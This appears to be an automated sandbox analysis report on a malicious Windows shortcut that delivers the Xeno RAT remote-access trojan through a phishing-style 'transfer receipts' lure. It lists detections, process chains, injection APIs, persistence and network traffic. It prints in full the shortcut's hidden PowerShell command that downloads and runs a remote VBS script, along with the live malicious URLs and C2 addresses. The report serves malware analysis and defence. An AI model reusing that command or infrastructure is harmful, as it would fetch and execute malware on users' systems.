                        Source: TRANSFERENCIA COMPROBANTES.lnk | ReversingLabs: Detection: 39%
                        Source: TRANSFERENCIA COMPROBANTES.lnk | Virustotal: Detection: 44%
                        Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\ .doc | Joe Sandbox ML: detected
                        Source: TRANSFERENCIA COMPROBANTES.lnk | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                        Source: unknown | HTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49699 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49701 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49727 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 52.123.243.181:443 -> 192.168.2.7:49728 version: TLS 1.2
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: *n.pdbzj4 source: powershell.exe, 00000001.00000002.1436897425.000001BD455E2000.00000004.00000020.00020000.00000000.sdmp

                        Software Vulnerabilities

                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Code function: 4x nop then jmp 012717B0h | 22_2_01270B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Code function: 4x nop then jmp 030517B0h | 23_2_03050B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Code function: 4x nop then jmp 030517B0h | 23_2_03050B53
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Code function: 4x nop then jmp 04CF17B0h | 24_2_04CF0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe | Code function: 4x nop then jmp 04CB17B0h | 26_2_04CB0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe | Code function: 4x nop then jmp 02FB17B0h | 27_2_02FB0B60
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe | Code function: 4x nop then jmp 018C17B0h | 28_2_018C0B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Code function: 4x nop then jmp 014D17B0h | 32_2_014D0B60
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Code function: 4x nop then jmp 00EF17B0h | 35_2_00EF0B60
                        Source: winword.exe | Memory has grown: Private usage: 1MB later: 91MB

                        Networking

                        Source: C:\Windows\System32\wscript.exe | Network Connect: 94.156.167.57 443
                        Source: Malware configuration extractor | URLs: dns.stipamana.com
                        Source: global traffic | TCP traffic: 192.168.2.7:49886 -> 87.120.121.160:4567
                        Source: global traffic | HTTP traffic detected:
                            GET /vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs HTTP/1.1
                            Host: www.stipamana.com
                            Connection: Keep-Alive
                        Source: Joe Sandbox View | IP Address: 87.120.121.160
                        Source: Joe Sandbox View | IP Address: 94.156.167.57
                        Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 94.156.167.57:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 52.123.243.181:443
                        Source: global traffic | HTTP traffic detected:
                            GET /docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.doc HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: text/plain; Charset=UTF-8
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: www.stipamana.com
                        Source: global traffic | HTTP traffic detected:
                            GET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1
                            Accept: */*
                            Accept-Language: en-ch
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: www.stipamana.com
                            Connection: Keep-Alive
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global traffic | HTTP traffic detected:
                            GET /config/v2/Office/word/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7bF43EFEF1-5530-47E1-A9BD-92EAF33B7348%7d&Application=word&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bA0E72725-605B-4822-B4DB-BD5E739C51EF%7d&LabMachine=false HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            If-None-Match: ""
                            User-Agent: Microsoft Office 2014
                            DisableExperiments: false
                            X-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130
                            Host: ecs.office.com
                        Source: global traffic | DNS traffic detected: DNS query: www.stipamana.com
                        Source: global traffic | DNS traffic detected: DNS query: dns.stipamana.com
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfy??o
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfyk
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykg
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgf
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfu#
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuk
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfukt
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktg
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgf
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfj
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfju
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjuf
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrk
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuEE
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuj.
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470130563.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485175841.0000029430A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujg
                        Source: wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrssl
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdiio
                        Source: wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgh~~o
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgles
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhi
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsp
                        Source: wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsq
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghdfhgd/tsj.dll
                        Source: wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryhsfghdfghppj
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/docdryl~
                        Source: powershell.exe, 00000001.00000002.1390837542.000001BD2B396000.00000004.00000020.00020000.00000000.sdmp, TRANSFERENCIA COMPROBANTES.lnkString found in binary or memory: https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf
                        Source: wscript.exe, 0000000A.00000003.1467671580.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1491729771.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477018602.0000029430A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com:443/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufr
                        Source: wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.comHELL32.dll$
                        Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
                        Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
                        Source: unknown HTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49699 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49701 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 94.156.167.57:443 -> 192.168.2.7:49727 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 52.123.243.181:443 -> 192.168.2.7:49728 version: TLS 1.2

                        System Summary

                        Source: .doc.10.dr OLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                        Source: .doc.10.dr Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                        Source: .doc.10.dr Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                        Source: .doc.10.dr Stream path 'Macros/VBA/ThisDocument' : found hex strings
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: XML HTTP Request HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32
                        Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                        Source: TRANSFERENCIA COMPROBANTES.lnk LNK file: -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E3A428 NtWriteVirtualMemory,21_2_04E3A428
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E3A580 NtSetContextThread,21_2_04E3A580
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E3A208 NtResumeThread,21_2_04E3A208
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E39CA0 NtReadVirtualMemory,21_2_04E39CA0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E3A420 NtWriteVirtualMemory,21_2_04E3A420
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E3A579 NtSetContextThread,21_2_04E3A579
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E3A200 NtResumeThread,21_2_04E3A200
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe Code function: 21_2_04E39C98 NtReadVirtualMemory,21_2_04E39C98
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_0508A580 NtSetContextThread,25_2_0508A580
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_0508A428 NtWriteVirtualMemory,25_2_0508A428
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_0508A208 NtResumeThread,25_2_0508A208
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_05089CA0 NtReadVirtualMemory,25_2_05089CA0
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_0508A579 NtSetContextThread,25_2_0508A579
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_0508A420 NtWriteVirtualMemory,25_2_0508A420
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_0508A200 NtResumeThread,25_2_0508A200
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe Code function: 25_2_05089C98 NtReadVirtualMemory,25_2_05089C98
                        Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeCode function: 35_2_00EF0B6035_2_00EF0B60
                        Source: .doc.10.dr | OLE, VBA macro line: Sub Document_Open()
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe 639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe 639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80
                        Source: cfdhxdzhtfxgh[1].exe.11.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GFKMTE.exe.11.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GFKMTE.exe.22.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, Encryption.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 21.2.GFKMTE.exe.26a0000.0.raw.unpack, -----------------------------------------.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, Encryption.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: classification engine | Classification label: mal100.troj.expl.evad.winLNK@35/244@2/4
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\pafdfgz.vbs
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Mutant created: NULL
                        Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7184
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Mutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4pek3x4.alp.ps1
                        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                        Source: TRANSFERENCIA COMPROBANTES.lnk | ReversingLabs: Detection: 39%
                        Source: TRANSFERENCIA COMPROBANTES.lnk | Virustotal: Detection: 44%
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs"
                        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe"
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F
                        Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
